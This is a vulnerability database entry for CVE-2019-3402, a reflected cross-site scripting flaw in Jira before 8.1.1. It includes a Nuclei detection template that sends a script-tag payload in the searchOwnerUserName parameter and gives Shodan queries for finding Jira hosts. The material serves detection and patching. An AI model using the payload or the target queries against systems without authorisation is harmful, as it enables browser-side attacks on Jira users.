Jira < 8.1.1 - Cross-Site Scripting

🗓️ 18 Jun 2026 12:11:27Reported by ProjectDiscoveryType

Jira < 8.1.1 - Cross-Site Scripting vulnerability via ConfigurePortalPages.jsp

Reporter	Title	Published	Views	Family All 13
Atlassian	XSS in the ConfigurePortalPages.jspa resource - CVE-2019-3402	29 Apr 201903:59	–	atlassian
Atlassian	XSS in the ConfigurePortalPages.jspa resource - CVE-2019-3402	29 Apr 201903:59	–	atlassian
Circl	CVE-2019-3402	22 May 201918:48	–	circl
CNVD	Atlassian Jira Cross-Site Scripting Vulnerability (CNVD-2019-32329)	23 May 201900:00	–	cnvd
CVE	CVE-2019-3402	22 May 201917:38	–	cve
Cvelist	CVE-2019-3402	22 May 201917:38	–	cvelist
Tenable Nessus	Atlassian Jira 7.13.x < 7.13.3, 8.x < 8.1.1 Cross-Site Scripting Vulnerability	25 Oct 201900:00	–	nessus
Tenable Nessus	Atlassian JIRA ConfigurePortalPages.jspa XSS	13 Sep 201900:00	–	nessus
Tenable Nessus	Atlassian Jira 7.13.x < 7.13.4 Multiple Vulnerabilities	14 Mar 202300:00	–	nessus
Tenable Nessus	Atlassian Jira 8.0.0 < 8.1.1 Multiple Vulnerabilities	14 Mar 202300:00	–	nessus

Source	Link
gist	www.gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
jira	www.jira.atlassian.com/browse/JRASERVER-69243
nvd	www.nvd.nist.gov/vuln/detail/CVE-2019-3402
github	www.github.com/ARPSyndicate/cvemon
github	www.github.com/Faizee-Asad/JIRA-Vulnerabilities

id: CVE-2019-3402

info:
  name: Jira < 8.1.1 - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: |
    Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement.
  remediation: |
    Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
  reference:
    - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
    - https://jira.atlassian.com/browse/JRASERVER-69243
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Faizee-Asad/JIRA-Vulnerabilities
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-3402
    cwe-id: CWE-79
    epss-score: 0.08947
    epss-percentile: 0.94578
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve,cve2019,atlassian,jira,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'<script>alert(1)</script>' does not exist"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402200728da1da5b771c2bfc70b389396d73cf4a40847e7a74e1d3c5414e926b63cb5022036aa584b45966b929cbb460745e0fe0bb56cbea43b29a299ca7988a4a80dc196:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 24.3

CVSS 36.1

EPSS0.08947